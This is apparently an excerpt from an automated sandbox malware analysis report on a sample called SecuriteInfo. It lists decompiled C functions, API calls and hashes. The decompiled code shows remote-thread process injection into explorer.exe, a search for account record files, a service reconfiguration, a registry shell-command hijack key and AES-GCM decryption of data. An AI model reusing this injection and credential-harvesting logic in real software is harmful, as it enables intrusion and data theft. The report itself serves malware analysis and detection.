                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 02D17AC5
                                                                    • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D17ADD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
                                                                    • String ID: XXXXXX
                                                                    • API String ID: 813767414-582547948
                                                                    • Opcode ID: 903e6ea5146465f23a9922f469695ea0930cf5fa7e702588e539d03c46f7849b
                                                                    • Instruction ID: 58c1df926f8a8a7922f6db5e195baa9635083b156005d4b7d2ae27439f99a731
                                                                    • Opcode Fuzzy Hash: 903e6ea5146465f23a9922f469695ea0930cf5fa7e702588e539d03c46f7849b
                                                                    • Instruction Fuzzy Hash: DC21C171A85215BAFB2196A0AD04FBFBB6CAB01715F210115FA14E02D0EBB48E44C679
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D19DF6 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D19DF6(intOrPtr __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				intOrPtr _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x2d296a8, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x2d296a8,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E02D19ADF(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}









                                                                    0x02d19e15
                                                                    0x02d19e17
                                                                    0x02d19e36
                                                                    0x02d19e4c
                                                                    0x02d19e51
                                                                    0x02d19e53
                                                                    0x02d19e5f
                                                                    0x02d19e7d
                                                                    0x02d19e8c
                                                                    0x02d19e97
                                                                    0x02d19e97
                                                                    0x02d19eaa
                                                                    0x02d19e53
                                                                    0x02d19eb4

                                                                    APIs
                                                                    • GetFullPathNameA.KERNEL32(02D296A8,00000104,?,00000000), ref: 02D19E17
                                                                    • PathCombineA.SHLWAPI(?,?,02D25F88), ref: 02D19E36
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D19E46
                                                                    • PathCombineA.SHLWAPI(?,02D296A8,0000002E), ref: 02D19E7D
                                                                    • PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 02D19E8C
                                                                      • Part of subcall function 02D19ADF: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 02D19AFC
                                                                      • Part of subcall function 02D19ADF: GetLastError.KERNEL32 ref: 02D19B09
                                                                      • Part of subcall function 02D19ADF: CloseHandle.KERNEL32(00000000), ref: 02D19B10
                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 02D19EA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
                                                                    • String ID: .$Accounts\Account.rec0
                                                                    • API String ID: 3873318193-2526347284
                                                                    • Opcode ID: e196209daf4bfd8c51ae6d09ea35bca74d6eb4cd3901a17f384c2d4bef9e4c37
                                                                    • Instruction ID: 578e4519eddbeb475daa15d63fb4874dcc71a74ba32f8048b91906af05ef957d
                                                                    • Opcode Fuzzy Hash: e196209daf4bfd8c51ae6d09ea35bca74d6eb4cd3901a17f384c2d4bef9e4c37
                                                                    • Instruction Fuzzy Hash: 6E1186B294122C6BEB20D6A4EC98EEE776CEB54214F1045E6A509D3280E7749E8C8F60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21FD8 Relevance: 13.6, APIs: 9, Instructions: 81injectionmemorythreadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D21FD8(long __edx) {
				void* _v8;
				long _v12;
				char _v268;
				void _v272;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t37;

				_t33 = OpenProcess(0x1fffff, 0, __edx);
				_v8 = _t33;
				_v272 = GetCurrentProcessId();
				_t35 = E02D11085(0xff);
				GetModuleFileNameA(0, _t13, 0xff);
				E02D11172( &_v268, _t35);
				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_t33, _t27, 0x2d29158, 0x800, 0);
				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
				_t9 = _t27 + 0x10e; // 0x10e
				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
				 *0x2e5cbec = _t25;
				return _t25;
			}











                                                                    0x02d21ff2
                                                                    0x02d21ff4
                                                                    0x02d22002
                                                                    0x02d22010
                                                                    0x02d22015
                                                                    0x02d22023
                                                                    0x02d2204d
                                                                    0x02d22057
                                                                    0x02d22068
                                                                    0x02d22083
                                                                    0x02d22095
                                                                    0x02d22099
                                                                    0x02d220a8
                                                                    0x02d220b0
                                                                    0x02d220b7

                                                                    APIs
                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,745D0770,00000000), ref: 02D21FEC
                                                                    • GetCurrentProcessId.KERNEL32 ref: 02D21FF7
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 02D22015
                                                                    • VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 02D2203F
                                                                    • WriteProcessMemory.KERNEL32(00000000,00000000,02D29158,00000800,00000000), ref: 02D22057
                                                                    • VirtualProtectEx.KERNEL32(02D21FD3,00000000,00000800,00000040,?), ref: 02D22068
                                                                    • VirtualAllocEx.KERNEL32(02D21FD3,00000000,00000103,00003000,00000004), ref: 02D2207F
                                                                    • WriteProcessMemory.KERNEL32(02D21FD3,00000000,?,00000103,00000000), ref: 02D22095
                                                                    • CreateRemoteThread.KERNEL32(02D21FD3,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 02D220A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
                                                                    • String ID:
                                                                    • API String ID: 900395357-0
                                                                    • Opcode ID: b423cfd597ba0ef7ff41d378285cb056ec8963adc1058644b6c491f67aaa8aa3
                                                                    • Instruction ID: 553d9b22c121bd5697e2cb9f9d6dc2120ac676245665e773e6a0457f0b538b8c
                                                                    • Opcode Fuzzy Hash: b423cfd597ba0ef7ff41d378285cb056ec8963adc1058644b6c491f67aaa8aa3
                                                                    • Instruction Fuzzy Hash: 02219671A80218BEF7209B51DD4AFEB7B6CEB54750F210165FB05A62C0DAF06E848F64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1D49C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52serviceCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1D49C(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}








                                                                    0x02d1d4a8
                                                                    0x02d1d4ab
                                                                    0x02d1d4b1
                                                                    0x02d1d4b5
                                                                    0x02d1d4c6
                                                                    0x02d1d4ca
                                                                    0x02d1d4ee
                                                                    0x02d1d4f2
                                                                    0x02d1d4f2
                                                                    0x02d1d4fa
                                                                    0x02d1d4fd
                                                                    0x02d1d4ff
                                                                    0x02d1d4cc
                                                                    0x02d1d4cd
                                                                    0x02d1d4d3
                                                                    0x02d1d4d3
                                                                    0x00000000
                                                                    0x02d1d501
                                                                    0x02d1d505

                                                                    APIs
                                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 02D1D4AB
                                                                    • OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 02D1D4C0
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D4CD
                                                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D1D4E6
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D4FA
                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 02D1D4FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                    • String ID: ServicesActive
                                                                    • API String ID: 493672254-3071072050
                                                                    • Opcode ID: 5596b01e817647dbbcc19b3d85fe7ef16f422977c03762091eeb21341a76a261
                                                                    • Instruction ID: 1f247165dfbfc2a5094d5bc61033fb7f73ce065258571b2a323605008a80d541
                                                                    • Opcode Fuzzy Hash: 5596b01e817647dbbcc19b3d85fe7ef16f422977c03762091eeb21341a76a261
                                                                    • Instruction Fuzzy Hash: 8EF0F63264022577D6301A6AAD8AE5B3F5DEBD67707110621FE16D2380CB60CC54C6A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D218BA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D218BA() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SECURITY_DESCRIPTOR* _v20;
				struct _SECURITY_ATTRIBUTES _v24;
				struct _SECURITY_DESCRIPTOR _v44;
				long _t20;

				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
					L5:
					return 0;
				} else {
					_v24 = 0xc;
					_v20 =  &_v44;
					_v16 = 0;
					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
					if(_t20 != 0) {
						SetLastError(_t20);
						goto L5;
					}
					RegCloseKey(_v8);
					return 1;
				}
			}










                                                                    0x02d218cf
                                                                    0x02d21931
                                                                    0x00000000
                                                                    0x02d218e5
                                                                    0x02d218e8
                                                                    0x02d218ef
                                                                    0x02d218f9
                                                                    0x02d21913
                                                                    0x02d2191b
                                                                    0x02d2192b
                                                                    0x00000000
                                                                    0x02d2192b
                                                                    0x02d21920
                                                                    0x00000000
                                                                    0x02d21926

                                                                    APIs
                                                                    • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,02D21B06), ref: 02D218C7
                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,02D21B06), ref: 02D218DB
                                                                    • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,02D21B06,?), ref: 02D21913
                                                                    • RegCloseKey.ADVAPI32(02D21B06), ref: 02D21920
                                                                    • SetLastError.KERNEL32(00000000), ref: 02D2192B
                                                                    Strings
                                                                    • Software\Classes\Folder\shell\open\command, xrefs: 02D21909
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                                                    • String ID: Software\Classes\Folder\shell\open\command
                                                                    • API String ID: 1473660444-2536721355
                                                                    • Opcode ID: dad83b4c61805b57d9c057c9c497ea8930076fa1d8bff10d936efe681e88da82
                                                                    • Instruction ID: 0fb29370bbf5483f38b52ff3b7b486c822d603c755658f834419e5d036ea3eef
                                                                    • Opcode Fuzzy Hash: dad83b4c61805b57d9c057c9c497ea8930076fa1d8bff10d936efe681e88da82
                                                                    • Instruction Fuzzy Hash: 3C010871D41228AADB209BA2AD49EDF7FBCEF19655F114521F906F2240E770CA48CAA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1CCB4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,02D1CA5F,?), ref: 02D1CCD1
                                                                    • BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCEA
                                                                    • BCryptGenerateSymmetricKey.BCRYPT(00000020,02D1CA5F,00000000,00000000,?,00000020,00000000,?,02D1CA5F,?), ref: 02D1CCFF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
                                                                    • String ID: AES$ChainingMode$ChainingModeGCM
                                                                    • API String ID: 1692524283-1213888626
                                                                    • Opcode ID: 55f2feab087df252567dfd6847cb55f0f9993f4aa056a057a703b4e438371a7b
                                                                    • Instruction ID: 72c8a7ad969155f41f8f86b1f1b9c574c6c6edd3c560be60b0900334e0d714f0
                                                                    • Opcode Fuzzy Hash: 55f2feab087df252567dfd6847cb55f0f9993f4aa056a057a703b4e438371a7b
                                                                    • Instruction Fuzzy Hash: E8F0C231681321BBEB240B5AFC09E9BBFACEF2AAA4B100026F505D2250D7A15C1487E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00412922 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1362COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 17050ba68c81e900161b8c06f5f4cdd3d0c630bdc4224e70a546b82872d3972e
                                                                    • Instruction ID: 49de30e82319f99e9f18cd666cded436137e256d470217a3937134d7d394c329
                                                                    • Opcode Fuzzy Hash: 17050ba68c81e900161b8c06f5f4cdd3d0c630bdc4224e70a546b82872d3972e
                                                                    • Instruction Fuzzy Hash: 9BC22971E046288BDB25CE28DD407EAB7B5EB48305F1441EBD84DE7240E778AEC58F89
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1CF58 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E02D1CF58(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v10;
				char _v12;
				long _v16;
				void* _v20;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				void* _t36;
				long _t50;
				void* _t54;
				int _t61;
				void* _t63;
				void* _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t63 = __ecx;
				_t73 = __edx;
				_v12 = 0x3176;
				_v10 = 0x30;
				_t75 = __ecx;
				if(__edx < 3) {
					L8:
					_push(_t63);
					_push( &_v16);
					_push( &_v20);
					_t36 = E02D1CA78(_t75, _t73, __eflags);
					__eflags = _t36;
					if(_t36 != 0) {
						_t76 = E02D11085(_v16 + 1);
						__eflags = _v16 + 1;
						E02D11052(_t76, 0, _v16 + 1);
						E02D1102C(_t76, _v20, _v16);
						LocalFree(_v20);
						goto L10;
					}
				} else {
					_t36 = E02D11000(__ecx,  &_v12, 3);
					_t77 = _t77 + 0xc;
					if(_t36 != 0) {
						goto L8;
					} else {
						if(_a4 != _t36 && _a8 != _t36) {
							_t61 = 0x40;
							E02D11052( &_v88, _t36, _t61);
							_t7 = _t75 + 3; // 0x3
							_v88 = _t61;
							_v80 = _t7;
							_t10 = _t73 - 0x10; // -16
							_v84 = 1;
							_v76 = 0xc;
							_v64 = _t10 + _t75;
							_t14 = _t73 - 0x1f; // -31
							_t50 = _t14;
							_v60 = 0x10;
							_v16 = _t50;
							_t36 = LocalAlloc(_t61, _t50);
							_t74 = _t36;
							if(_t74 != 0) {
								_t54 = _v80 + _v76;
								__imp__BCryptDecrypt(_a8, _t54, _v16,  &_v88, 0, 0, _t74, _v16,  &_v16, 0);
								if(_t54 != 0) {
									return 0x2d26056;
								}
								_t76 = E02D11085(_v16 + 1);
								E02D11052(_t76, 0, _v16 + 1);
								E02D1102C(_t76, _t74, _v16);
								LocalFree(_t74);
								L10:
								return _t76;
							}
						}
					}
				}
				return _t36;
			}























                                                                    0x02d1cf58
                                                                    0x02d1cf61
                                                                    0x02d1cf63
                                                                    0x02d1cf69
                                                                    0x02d1cf6d
                                                                    0x02d1cf72
                                                                    0x02d1d04b
                                                                    0x02d1d04b
                                                                    0x02d1d051
                                                                    0x02d1d057
                                                                    0x02d1d05b
                                                                    0x02d1d063
                                                                    0x02d1d065
                                                                    0x02d1d075
                                                                    0x02d1d077
                                                                    0x02d1d07c
                                                                    0x02d1d08b
                                                                    0x02d1d096
                                                                    0x00000000
                                                                    0x02d1d096
                                                                    0x02d1cf78
                                                                    0x02d1cf7f
                                                                    0x02d1cf84
                                                                    0x02d1cf89
                                                                    0x00000000
                                                                    0x02d1cf8f
                                                                    0x02d1cf92
                                                                    0x02d1cfa3
                                                                    0x02d1cfaa
                                                                    0x02d1cfaf
                                                                    0x02d1cfb2
                                                                    0x02d1cfb5
                                                                    0x02d1cfbb
                                                                    0x02d1cfbe
                                                                    0x02d1cfc7
                                                                    0x02d1cfce
                                                                    0x02d1cfd1
                                                                    0x02d1cfd1
                                                                    0x02d1cfd6
                                                                    0x02d1cfdd
                                                                    0x02d1cfe0
                                                                    0x02d1cfe6
                                                                    0x02d1cfea
                                                                    0x02d1d007
                                                                    0x02d1d00e
                                                                    0x02d1d016
                                                                    0x00000000
                                                                    0x02d1d044
                                                                    0x02d1d026
                                                                    0x02d1d02c
                                                                    0x02d1d039
                                                                    0x02d1d096
                                                                    0x02d1d096
                                                                    0x00000000
                                                                    0x02d1d09c
                                                                    0x02d1cfea
                                                                    0x02d1cf92
                                                                    0x02d1cf89
                                                                    0x02d1d0a2

                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 02D1CFE0
                                                                    • BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 02D1D00E
                                                                      • Part of subcall function 02D11085: GetProcessHeap.KERNEL32(00000000,?,02D21E36,00400000,?,?,00000000,?,?,02D234BF), ref: 02D1108B
                                                                      • Part of subcall function 02D11085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,02D234BF), ref: 02D11092
                                                                    • LocalFree.KERNEL32(?), ref: 02D1D096
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: HeapLocal$AllocAllocateCryptDecryptFreeProcess
                                                                    • String ID: 0$v1
                                                                    • API String ID: 4131498132-3331332043
                                                                    • Opcode ID: e88e0ba3970b02d67f556b461b94463bbbc8857a56f2d7a01a785b378c5e8a08
                                                                    • Instruction ID: 2147399117abd6ea92a446150b193c6a82e453646696a952c199e35f52d50eeb
                                                                    • Opcode Fuzzy Hash: e88e0ba3970b02d67f556b461b94463bbbc8857a56f2d7a01a785b378c5e8a08
                                                                    • Instruction Fuzzy Hash: D8414FB2D00118BBDB159BE5EC44EAEBBBEEF44344F144026E915E6340E7759E09CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D220B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D220B8(void* __ecx, void* __eflags) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E02D11052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E02D11144( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}








                                                                    0x02d220d2
                                                                    0x02d220de
                                                                    0x02d220e6
                                                                    0x02d220f4
                                                                    0x02d22121
                                                                    0x02d22111
                                                                    0x00000000
                                                                    0x02d22132
                                                                    0x02d2211b
                                                                    0x02d2211b
                                                                    0x02d22126
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D220C7
                                                                    • Process32First.KERNEL32(00000000,?), ref: 02D220F4
                                                                    • Process32Next.KERNEL32 ref: 02D2211B
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D22126
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                    • String ID: explorer.exe
                                                                    • API String ID: 420147892-3187896405
